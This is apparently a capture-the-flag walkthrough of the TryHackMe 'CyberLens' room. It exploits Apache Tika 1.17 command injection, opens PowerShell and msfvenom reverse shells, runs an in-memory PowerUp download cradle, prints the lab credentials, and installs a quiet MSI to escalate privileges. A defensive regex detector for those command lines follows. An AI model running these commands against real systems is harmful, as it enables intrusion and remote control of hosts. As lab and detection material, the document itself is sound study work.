Room Link: https://tryhackme.com/r/room/cyberlensp6
Kali
echo $VICTIM cyberlens.thm >> /etc/hosts
cat /etc/hosts
Scans
Initial scan
Kali
nmap -A cyberlens.thm
Longer scan
Kali
nmap -sV -sT -O -p 1-65535 cyberlens.thm
TCP/80 - HTTP
Find Pages
Kali
ffuf -u http://cyberlens.thm/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
TCP/61777 - HTTP
Find Pages
Kali
ffuf -u http://cyberlens.thm:61777/FUZZ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -fc 404,403 -e .php,.html,.txt
The other web server is running Tika 1.17, which has a command injection exploit.
Initial Shell
Kali
searchsploit tika
searchsploit -m windows/remote/46540.py
Kali #1
python2 -m SimpleHTTPServer 82
Kali #2
python3 46540.py cyberlens.thm 61777 "curl http://10.10.178.238:82"
I tried to download multiple reverse shells, but the problem seemed to be that I couldn't save them anywhere, so I did a base64-encoded PowerShell reverse shell.
Kali #1
Kali #2
python3 46540.py cyberlens.thm 61777 "powershell -e <BASE64_ENCODED_PAYLOAD>"
Web Access
Victim
cd C:\Users\CyberLens\Documents\Management
type CyberLens-Management.txt
Kali
remmina
Username: CyberLens
Password: HackSmarter123
Privilege Escalation
Load PowerUp.ps1 into memory.
Kali
wget https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1
python2 -m SimpleHTTPServer 82
Add the following line at the bottom of PowerUp.ps1 so it invokes all checks automatically once downloaded.
PowerUp.ps1
Victim(powershell)
powershell -ep bypass
iex (New-Object Net.WebClient).DownloadString("http://$KALI:82/PowerUp.ps1")
Kali
msfvenom -p windows/x64/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f msi > shell.msi
Kali
Victim(powershell)
cd C:\temp
iwr -uri "http://$KALI:82/shell.msi" -o shell.msi
msiexec /quiet /qn /i C:\temp\shell.msi
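Detection
The command lines used in this walkthrough leave recognizable process-creation and script-block telemetry. The following is an added example, not part of the original write-up: a small detector that flags the encoded PowerShell launch, the execution-policy bypass, the in-memory download cradle and the quiet MSI install. The event schema, rule names, sample events and the assumption that the Tika server runs under java.exe are all constructed for illustration.

```python
import re
from ntpath import basename  # Windows-style path handling on any OS

# Constructed rules keyed to the command lines in this write-up; rule names are hypothetical.
RULES = {
    "encoded_powershell": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-e(c|n[a-z]*)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "execution_policy_bypass": re.compile(
        r"\bpowershell(\.exe)?\b.*\s-(ep|ex[a-z]*)\s+bypass\b", re.I),
    "download_cradle": re.compile(
        r"\b(iex|invoke-expression)\b.*downloadstring\s*\(", re.I),
    "quiet_msi_install": re.compile(
        r"\bmsiexec(\.exe)?\b(?=.*\s/(quiet|qn)\b)(?=.*\s/i\s+\S+\.msi\b)", re.I),
}
# Assumption: the Tika server runs under a Java runtime, which has no reason to spawn a shell.
SERVER_PARENTS = {"java.exe", "javaw.exe"}
SHELLS = {"powershell.exe", "cmd.exe"}

def detect(event):
    """Return the sorted names of the rules an event matches.

    event: dict with 'parent' and 'image' (paths) and 'text' (a process command
    line or a logged PowerShell script block). This schema is an assumption.
    """
    hits = {name for name, rx in RULES.items() if rx.search(event["text"])}
    if (basename(event["parent"]).lower() in SERVER_PARENTS
            and basename(event["image"]).lower() in SHELLS):
        hits.add("shell_from_server_runtime")
    return sorted(hits)

# Constructed sample events (not real telemetry); the base64 value is a dummy string.
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Java\bin\java.exe", "image": r"C:\Windows\System32\powershell.exe",
     "text": "powershell -e QUFBQUFBQUFBQUFBQUFBQQ=="},
    {"parent": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\powershell.exe",
     "text": "powershell -ep bypass"},
    {"parent": r"C:\Windows\System32\powershell.exe", "image": r"C:\Windows\System32\powershell.exe",
     "text": r'iex (New-Object Net.WebClient).DownloadString("http://192.0.2.10:82/script.ps1")'},
    {"parent": r"C:\Windows\System32\powershell.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "text": r"msiexec /quiet /qn /i C:\temp\shell.msi"},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\msiexec.exe",
     "text": r"msiexec /i C:\installers\app.msi"},  # benign interactive install
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(detect(ev), "<-", ev["text"])
```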